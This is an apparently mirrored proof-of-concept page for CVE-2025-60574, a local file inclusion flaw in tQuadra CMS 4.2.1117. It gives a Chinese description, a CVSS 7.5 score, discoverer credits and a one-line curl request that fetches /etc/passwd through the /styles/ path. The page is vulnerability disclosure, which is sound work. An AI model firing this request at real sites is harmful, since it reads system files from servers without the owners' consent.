CVE-2025-60574 PoC — tQuadra CMS 安全漏洞

Source

https://github.com/jacopoaugelli/CVE-2025-60574

Associated Vulnerability

Title:tQuadra CMS 安全漏洞 (CVE-2025-60574)
Description:tQuadra CMS是意大利tQuadra CMS公司的一个内容管理系统。 tQuadra CMS 4.2.1117版本存在安全漏洞，该漏洞源于/styles路径未正确清理用户输入，可能导致本地文件包含攻击。

Readme

# Vulnerability Discoverers & Exploit Authors

Stefano Andreatta & Jacopo Candido Augelli

---

# CVE-2025-60574

## Vulnerability Description

A Local File Inclusion (LFI) vulnerability has been identified in tQuadra CMS 4.2.1117. The issue exists in the "/styles/" path, which fails to properly sanitize user-supplied input. An attacker can exploit this by sending a crafted GET request to retrieve arbitrary files from the underlying system.

Discoverers: Stefano Andreatta & Jacopo Candido Augelli

## CVSS 3.1 - 7.5 High

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
```

## Proof of Concept

```bash
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
```
![PoC.png](PoC.png)

File Snapshot


 [4.0K]  /data/pocs/1f10fc2c37326a753b623b70f807091fbf69d24e
├── [218K]  PoC.png
└── [ 709]  README.md

1 directory, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!